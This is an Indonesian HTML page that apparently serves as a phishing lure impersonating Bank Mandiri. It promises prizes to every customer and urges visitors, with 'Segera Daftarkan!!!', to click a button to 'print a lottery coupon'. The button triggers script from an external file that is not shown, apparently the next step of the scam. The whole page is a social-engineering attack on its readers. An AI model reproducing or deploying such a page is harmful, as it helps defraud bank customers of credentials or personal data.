
<html>
	<head>
		<title>Cetak Kupon Sekarang</title>
		<meta property="og:image" content="https://hosting.tigerengine.id/30p34h.png">
		<meta property="description" content="Dapatkan hadiah menarik dari Bank Mandiri buat kamu yang beruntung.">
		<meta property="og:site_name" content="Cetak Kupon Sekarang">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">
		<link rel="stylesheet" href="assets/common/css/global.css">
		<link rel="stylesheet" href="assets/common/css/intro.css">
		<link rel="stylesheet" href="assets/lib/loader/loader.css">
		<link rel="stylesheet" href="assets/lib/ripple/ripple.css">
		<script src="assets/lib/jquery/jquery.js"></script>
		<script>
			const module = {};
		</script>
		<script type="module" src="assets/common/js/intro.js"></script>
		<script type="module" src="ionicons%407.1.0/dist/ionicons/ionicons.esm.js"></script>
        <script nomodule="" src="ionicons%407.1.0/dist/ionicons/ionicons.js"></script>
	</head>
	<body>
		<div style="width: 100%; height: 100%; display: flex; flex-direction: column; align-items: center; background-image: linear-gradient(to right, #399bd8, #1f76d3);">
			<img src="assets/common/img/img1.gif" style="width: 100%; height: 50%; object-fit: fill; border-bottom-right-radius: 60px;">
			<div style="color: #fbfe0b; font-family: 'my-font'; font-size: 20px; margin-top: 20px; text-align: center;">Segera Daftarkan!!!</div>
			<div style="color: #ffffff; font-family: 'my-font'; font-size: 15px; margin-top: 0; margin-left: 20px; margin-right: 20px; text-align: center;">Untuk semua nasabah bank Mandiri, semua bisa dapat hadiah. Klik tombol di bawah ini untuk cetak kupon undian.</div>
			<div onclick="module.next()" class="ripple" style="box-shadow: 0 5px 10px 5px rgba(0,0,0,.2); padding: 10px; margin-top: 20px; margin-bottom: 50px; border-radius: 5px; background-color: #f5b324; display: flex; flex-direction: row; align-items: center;">
				<ion-icon name="ticket" style="color: #ffffff; font-size: 30px;"></ion-icon>
				<div style="color: #ffffff; font-size: 17px; margin-left: 10px;"><b>Cetak Kupon Undian</b></div>
			</div>
		</div>
	</body>
</html>